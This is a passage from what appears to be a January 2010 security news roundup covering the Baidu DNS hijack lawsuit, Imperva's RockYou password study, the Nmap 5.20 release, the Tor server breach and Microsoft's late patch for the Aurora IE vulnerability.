News item 5: http://www.boston.com/business/technology/articles/2010/01/20/chinas_baidu_sues_us_company_over_hacking/
China’s most popular search engine, Baidu Inc., is accusing its U.S.-based domain name registry of negligence in a lawsuit over a hacking attack that temporarily blocked access to the site last week.
Baidu said Wednesday it has filed suit against Register.com Inc. in a New York court, seeking unspecified damages. Hackers blocked access to Baidu on Jan. 12 by steering traffic to a Web site where a group reportedly calling itself the “Iranian Cyber Army” claimed responsibility. There was no evidence the hackers were linked to Iran.
News item 6: http://www.imperva.com/docs/WP_Consumer_Password_Worst_Practices.pdf
What’s the most common password among the 32 million people who’s accounts were hacked at RockYou late last year? According to a study by Imperva, it’s “123456,” followed by “12345,” “123456789″ and “Password,” in that order. “iloveyou” came in at no. 5. The really depressing thing is that users tend to use the same passwords on all or most of their work and personal accounts. If you want your password to be the stunningly simple “123456″ on RockYou and other social sites, that’s fine. Just don’t use that same password for gmail, your bank and your work accounts.
News item 7: http://nmap.org/download.html
Nmap 5.20 offers more than 150 significant improvements:
- 30+ new Nmap Scripting Engine scripts
- Enhanced performance and reduced memory consumption
- Protocol-specific payloads for more effectie UDP scanning
- Massive OS and version detection DB updates (10,000+ signatures).
Nmap’s traceroute has been rewritten for better performance. Probes are sent in parallel to individual hosts, not just across all hosts as before. Trace consolidation is more sophisticated, allowing common traces to be identified sooner and fewer probes to be sent.
News item 8: http://www.theregister.co.uk/2010/01/22/tor_security_update/
Users of the Tor anonymiser network have been urged to upgrade their software, following the discovery of a security breach. Two of seven directory authorities and a metrics data server were compromised in a hack discovered earlier this month, Tor developer Roger Dingledine explains. The three servers were taken offline and refurbished following the hack. Fresh identity keys for the two directory authorities hit by the hack were created during the refurbishment process. Users should therefore update to either Tor version 0.2.1.22 or 0.2.2.7-alpha, so that they can use the refurbished servers as conduits for sensitive traffic.
News item 9:http://www.theregister.co.uk/2010/01/22/aurora_exploit_known_months/
Microsoft first knew of the bug used in the infamous Operation Aurora IE exploits as long ago as August, four months before the vulnerability was used in exploits against Google and other hi-tech firms in December, it has emerged. Redmond’s security gnomes finally got around to patching the exploit on Thursday. Microsoft’s advisory accompanying its cumulative update for IE credited Meron Sellem of Israeli firm BugSec for reporting the HTML Object Memory Corruption Vulnerability (CVE-2010-0249), the zero-day vulnerability used in the now infamous attacks.
)
